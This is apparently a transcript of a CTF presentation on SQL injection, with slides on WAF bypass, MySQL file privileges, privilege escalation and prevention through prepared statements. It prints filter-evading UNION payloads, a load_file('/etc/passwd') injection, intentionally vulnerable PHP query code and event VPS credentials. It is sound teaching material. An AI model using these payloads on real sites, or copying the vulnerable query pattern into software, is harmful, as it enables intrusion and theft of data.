Omega CTF Presentation

Transcript

1. None

2. RULES • No DDoSing to the servers • You can

   use whatever tools you want • Goal is to exploit the web app and root the box, then capture the flag inside the /root/ folder • Credentials for a temporary VPS to get a reverse shell • [email protected]:ilovelinux123
3. None

4. START HACKING! 873067175 [email protected]:ilovelinux123

5. ABOUT ME Not any geek or any nerd ;-) https://osandamalith.com

   Passionate in Penetration Testing and Reverse Engineering IT Security Consultant at ZeroDayLab, London. Currently holds: OSCE, OSCP, OSWP, CREST CRTPEN, eCRE, eWPTX, eCPPTX, eCPPT Author of few vulnerabilities and 0days. https://www.exploit- db.com/?author=6712 I love to make things, break things and make things that break things ;) DJ at Ministry of Sound, London, UK
6. None

7. ALL MY EXPLOITS INSIDE KALI • grep -rnw '/usr/share/exploitdb/exploits/' -e

   'Osanda’

8. • https://thehackernews.com/2018/09/4g-ee-wifi- modem-hack.html • https://www.theregister.co.uk/2018/09/19/ee_ modem_vuln/

9. None
10. None

11. BUG BOUNTY VS PENTESTING

12. None
13. None

14. PENETRATION PROCESS • Information Gathering • Scanning • Enumeration •

    VA & Exploitation • Post Exploitation

15. SQL INJECTION

16. None

17. SQL Injection Intention Extracting data, Bypassing Auth, Priv Esc, etc

    Source of Vulnerability User input, HTTP headers, second order injection, Files, etc Exploitation Technique Inband, Out-of-Band, Inference

18. SQLi Exploitation Techniques Inband Union-Based Error-Based Out-of-Band HTTP, DNS, Email

    Inference Boolean Based Time Based

19. MY ERROR BASED RESEARCHES • Error Based SQL Injection Using

    EXP • https://osandamalith.com/2015/07/15/error-based-sql-injection-using-exp/ • https://www.exploit-db.com/papers/37953 • BIGINT Overflow Error Based SQL Injection • https://osandamalith.com/2015/07/08/bigint-overflow-error-based-sql-injection/ • https://www.exploit-db.com/papers/37733

20. MYSQL OUT OF BAND HACKING • https://osandamalith.com/2017/02/03/m ysql-out-of-band-hacking/ • https://www.exploit-

    db.com/papers/41273 • https://packetstormsecurity.com/files/14 0832/MySQL-OOB-Hacking.html

21. VULNERABLE QUERY • $query = "SELECT id,name,join_date,title FROM members WHERE

    name = '" . $member_name . “’;”; • SELECT id,name,join_date,title FROM members WHERE name = ‘Ergo’; • SELECT id,name,join_date,title FROM members WHERE name = ‘Ergo’ UNION SELECT 1,2,3,4; • SELECT id,name,join_date,title FROM members WHERE name = ‘Ergo’ UNION SELECT @@version,2,3,4;

22. WEB APPLICATION FIREWALLS

23. WAFS! if (isset($_REQUEST['member_name']) && $_REQUEST['member_name'] !== '') { $member_name =

    $_REQUEST['member_name']; $member_name = preg_replace("/union|select/i", "", $member_name); $member_name = preg_replace("/into|outfile|dumpfile|[#]|[--]/i", "nope", $member_name); $member_name = preg_replace("(or|and|OR|AND)", "nope", $member_name); $connection = @mysqli_connect(MYSQLHOST, MYSQLUSER, MYSQLPASS, MYSQLDB);

24. WAFS! if (preg_match('/UNION|SELECT|union|select|\s/', $workaround)) { echo "<div class=\"bad\" align=\"center\"> ";

    echo "<br/>SQL Injection Attempt Detected!<br/>"; echo "</div>";

25. WHEN /OR/i IS FILTERED. • https://osandamalith.com/2017/02 /03/alternative-for- information_schema-tables-in- mysql/ •

    https://www.exploit- db.com/papers/41274 • https://packetstormsecurity.com/fi les/140831/Alternative-For- Information_Schema.Tables-In- MySQL.html
26. None
27. None

28. MYSQL PRIVILEGES • File_priv • Enables reading and writing files

    on the server host using the LOAD DATA and SELECT ... INTO OUTFILE statements and the LOAD_FILE() function. A user who has the FILE privilege can read any file on the server host that is either world- readable or readable by the MySQL server. (This implies the user can read any file in any database directory, because the server can access any of those files.) • Enables creating new files in any directory where the MySQL server has write access. This includes the server's data directory containing the files that implement the privilege tables. •

29. CHECKING PRIVELEGES

30. • select File_priv from mysql.user where user = substring_index(user(), '@',

    1) ; • null'unUNIONiOn/**/selSELECTeCt/**/1,File_Priv,3,4/**/from/**/mysql.user/**/ where/**/user=substring_index(user(),'@',1)&&1=‘1

31. PASSWD FILE • null'uNunionIoN/**/SeLselectEcT/**/1,load_file('/etc/passwd' ),3,4||1='1

32. SOURCE CODE REVIEW

33. SOURCE CODE REVIEW! • /var/www/html/auth.php

34. INVESTIGATING THE COOKIE FUNCTIONS • /var/www/html/includes/security.php

35. EVAL IS DANGEROUS https://osandamalith.com/2017/05/11/cmsms-2-1-6-multiple-vulnerabilities/

36. CREATING A COOKIE

37. OUR EXPLOIT!

38. PWNED!

39. ROOT THE BOX! PRIVILEGE ESCALATION • System and network information

    • User information • Privileged Access / Cleartext credentials • Services • Jobs/Tasks • Installed software version information

40. CAPTURE THE FLAG [CTF]

41. None

42. SQLI PREVENTION • Use prepared statements and parameterized queries •

    Using PHP Data Objects (PDO) $stmt = $pdo->prepare('SELECT * FROM employees WHERE name = :name'); $stmt->execute(array('name' => $name)); foreach ($stmt as $row) { // Do something with $row } • Supports any database driver and the universal option.

43. SQLI PREVENTION • Using MySQLi Extension (MySQL Improved) $stmt =

    $dbConnection->prepare('SELECT * FROM employees WHERE name = ?'); $stmt->bind_param('s', $name); // 's' specifies the variable type => 'string' $stmt->execute(); $result = $stmt->get_result(); while ($row = $result->fetch_assoc()) { // Do something with $row }

44. ALL MY RESEARCHES ON SQL INJECTION • https://osandamalith.com/tag/mysql/

45. ANY QUESTIONS?